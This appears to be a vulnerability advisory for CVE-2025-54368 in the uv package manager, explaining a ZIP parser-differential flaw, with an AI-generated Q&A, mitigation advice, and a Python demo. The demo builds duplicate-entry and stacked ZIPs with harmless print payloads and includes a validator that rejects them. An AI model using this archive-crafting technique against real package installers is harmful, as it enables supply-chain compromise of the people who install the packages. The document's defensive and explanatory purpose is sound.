CVE-2025-54368
BaseFortify

Publication date: 2025-08-08

Last updated on: 2025-08-08

Assigner: GitHub, Inc.

Description
uv is a Python package and project manager written in Rust. In versions 0.8.5 and earlier, remote ZIP archives were handled in a streamwise fashion, and file entries were not reconciled against the archive's central directory. An attacker could contrive a ZIP archive that would extract with legitimate contents on some package installers, and malicious contents on others due to multiple local file entries. An attacker could also contrive a "stacked" ZIP input with multiple internal ZIPs, which would be handled differently by different package installers. The attacker could choose which installer to target in both scenarios. This issue is fixed in version 0.8.6. Users may set UV_INSECURE_NO_ZIP_VALIDATION=1 to revert to the previous behavior (that is, the pre-0.8.6 handling without central-directory validation; this disables the fix rather than mitigating the issue, and is only an escape hatch for archives that fail the new validation).
Meta Information
AI Q&A generated: 2025-08-08
EPSS evaluated: 2026-05-05
Affected Vendors & Products (2 associated CPEs)
Vendor     Product  Version  Status
astral-sh  uv       0.8.5    affected (all earlier versions are affected as well)
astral-sh  uv       0.8.6    fixed
CWE
CWE-436 (Interpretation Conflict): Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
CWE-20 (Improper Input Validation): The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the uv Python package and project manager (written in Rust) in versions 0.8.5 and earlier, and concerns how remote ZIP archives are processed. A ZIP file carries two descriptions of its contents: the sequence of local file headers at the front of the archive and the central directory at the end. uv read remote archives streamwise, trusting the local headers as they arrived, without reconciling them against the central directory. Because other installers resolve entries through the central directory, an attacker can build a single archive that the two kinds of reader interpret differently: with two local entries carrying the same file name, only one of which the central directory lists, a streaming reader and a directory-based reader extract different contents for that name. A "stacked" archive, several complete ZIPs concatenated into one input, produces the same split, since one reader starts from the front and the other locates the end-of-central-directory record. In both cases the attacker picks which installer receives the malicious contents while the others see legitimate ones. The issue is fixed in version 0.8.6, which validates entries against the central directory.
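The disagreement described in the Description and in the answer above, as an added example that is not uv's code or the advisory's: it constructs (a) a ZIP with two local entries of the same name where the central directory lists only the benign one and (b) a stacked ZIP of two complete archives, then reads each with a naive streaming reader (a stand-in for a streamwise installer, not uv's actual parser) and with Python's central-directory-based zipfile, and finally runs an independent reconciliation check of the kind 0.8.6 introduced. The archives use stored (uncompressed) entries without data descriptors and all file names and contents are constructed for the demo.

```python
# Added example (not uv's code): two ZIP parsing strategies disagreeing over the same bytes,
# plus a reconciliation check that rejects archives on which they would disagree.
import io
import struct
import zipfile
import zlib

LOCAL_FMT, CENTRAL_FMT, EOCD_FMT = "<I5H3I2H", "<I6H3I5H2I", "<I4H2IH"  # 30, 46, 22 bytes
LOCAL_MAGIC, CENTRAL_MAGIC, EOCD_MAGIC = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
DOS_DATE = (1 << 5) | 1  # 1980-01-01, a valid DOS date for readers that decode timestamps

# Constructed sample contents; the name mimics a wheel member but is arbitrary.
NAME = b"pkg/__init__.py"
BENIGN = b"print('hello from a harmless package')\n"
MALICIOUS = b"print('attacker-controlled code ran')\n"


def local_entry(name, data):
    """Stored (method 0) local file header + name + data, no data descriptor."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    return struct.pack(LOCAL_FMT, 0x04034B50, 20, 0, 0, 0, DOS_DATE,
                       crc, len(data), len(data), len(name), 0) + name + data


def central_entry(name, data, offset):
    """Central directory record pointing at the local header at `offset`."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    return struct.pack(CENTRAL_FMT, 0x02014B50, 20, 20, 0, 0, 0, DOS_DATE,
                       crc, len(data), len(data), len(name), 0, 0, 0, 0, 0, offset) + name


def build_zip(entries, listed):
    """Write every (name, data) in `entries` as a local entry, in order, but reference
    only the indices in `listed` from the central directory."""
    body, offsets = b"", []
    for name, data in entries:
        offsets.append(len(body))
        body += local_entry(name, data)
    cd = b"".join(central_entry(*entries[i], offsets[i]) for i in listed)
    eocd = struct.pack(EOCD_FMT, 0x06054B50, 0, 0, len(listed), len(listed), len(cd), len(body), 0)
    return body + cd + eocd


def clean_zip():
    return build_zip([(NAME, BENIGN)], listed=[0])


def duplicate_entry_zip():
    # Two local entries share a name; the central directory lists only the benign one.
    return build_zip([(NAME, BENIGN), (NAME, MALICIOUS)], listed=[0])


def stacked_zip():
    # Two complete archives concatenated; the attacker chooses which one each reader sees.
    return build_zip([(NAME, BENIGN)], [0]) + build_zip([(NAME, MALICIOUS)], [0])


def stream_extract(blob):
    """Naive streaming reader: walk local headers from offset 0 until another signature.
    A repeated name overwrites the earlier file, as extraction to disk would."""
    files, pos = {}, 0
    while blob[pos:pos + 4] == LOCAL_MAGIC:
        hdr = struct.unpack_from(LOCAL_FMT, blob, pos)
        csize, nlen, xlen = hdr[7], hdr[9], hdr[10]
        start = pos + 30 + nlen + xlen
        files[blob[pos + 30:pos + 30 + nlen]] = blob[start:start + csize]
        pos = start + csize
    return files


def central_extract(blob):
    """Central-directory reader (Python's zipfile): trusts only what the directory lists."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {info.filename.encode(): zf.read(info) for info in zf.infolist()}


def validate(blob):
    """Reconcile local entries against the central directory (an independent sketch of the
    kind of check uv 0.8.6 added, not its implementation). Returns a list of findings;
    an empty list means both views of the archive agree."""
    findings, local, pos = [], {}, 0
    while blob[pos:pos + 4] == LOCAL_MAGIC:
        hdr = struct.unpack_from(LOCAL_FMT, blob, pos)
        crc, csize, nlen, xlen = hdr[6], hdr[7], hdr[9], hdr[10]
        local[pos] = (blob[pos + 30:pos + 30 + nlen], crc, csize)
        pos += 30 + nlen + xlen + csize
    eocd_at = blob.rfind(EOCD_MAGIC)
    if eocd_at < 0:
        return ["no end-of-central-directory record"]
    n, cd_size, cd_offset, comment_len = struct.unpack_from(EOCD_FMT, blob, eocd_at)[4:]
    if cd_offset != pos:
        findings.append(f"central directory claimed at {cd_offset}, local entries end at {pos}")
    if cd_offset + cd_size != eocd_at or eocd_at + 22 + comment_len != len(blob):
        findings.append("directory and EOCD do not account for the whole file (stacked/padded archive)")
    referenced, p = set(), cd_offset
    for _ in range(n):
        if blob[p:p + 4] != CENTRAL_MAGIC or p + 46 > len(blob):
            findings.append(f"no central directory record at offset {p}")
            break
        ch = struct.unpack_from(CENTRAL_FMT, blob, p)
        crc, csize, nlen, xlen, clen, off = ch[7], ch[8], ch[10], ch[11], ch[12], ch[16]
        name = blob[p + 46:p + 46 + nlen]
        p += 46 + nlen + xlen + clen
        if local.get(off) != (name, crc, csize):
            findings.append(f"directory record {name!r} -> offset {off} has no matching local header")
        referenced.add(off)
    for off in sorted(set(local) - referenced):
        findings.append(f"local entry {local[off][0]!r} at offset {off} is not in the central directory")
    return findings


if __name__ == "__main__":
    for label, blob in [("clean", clean_zip()), ("duplicate", duplicate_entry_zip()), ("stacked", stacked_zip())]:
        print(label, "| stream:", stream_extract(blob)[NAME], "| central:", central_extract(blob)[NAME])
        print("   findings:", validate(blob) or "none")
```

On the duplicate-entry archive the streaming reader ends up with the malicious file (last local entry wins) while zipfile returns the benign one; on the stacked archive it is the reverse, the streaming reader stops at the first archive's central directory and zipfile honours the last end-of-central-directory record. Swapping which entry is benign flips the target, which is the "attacker chooses the installer" point of the advisory. The validator reports every orphaned or mismatched local entry and any bytes the directory does not account for, so either archive is rejected before anything is written to disk; the clean archive produces no findings.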


How can this vulnerability impact me?

Python wheels and many source distributions are ZIP archives, so an attacker who can get uv to fetch a crafted archive (for example by publishing it to an index or serving it from a URL a project depends on) can make uv 0.8.5 or earlier install files that differ from what the same archive yields under other installers or in a reviewer's tooling. The attacker-chosen contents then run with the privileges of whatever imports or executes the installed package, compromising the software environment and any system that trusts it.


What immediate steps should I take to mitigate this vulnerability?

Upgrade uv to version 0.8.6 or later, which reconciles ZIP entries against the central directory and rejects archives where the two views disagree. Do not treat UV_INSECURE_NO_ZIP_VALIDATION=1 as a mitigation: setting it reverts uv to the previous, vulnerable handling and exists only so that an archive which fails the new validation can still be installed once the trade-off is understood. If you must set it, scope it to the single problematic install rather than to your environment or CI as a whole.

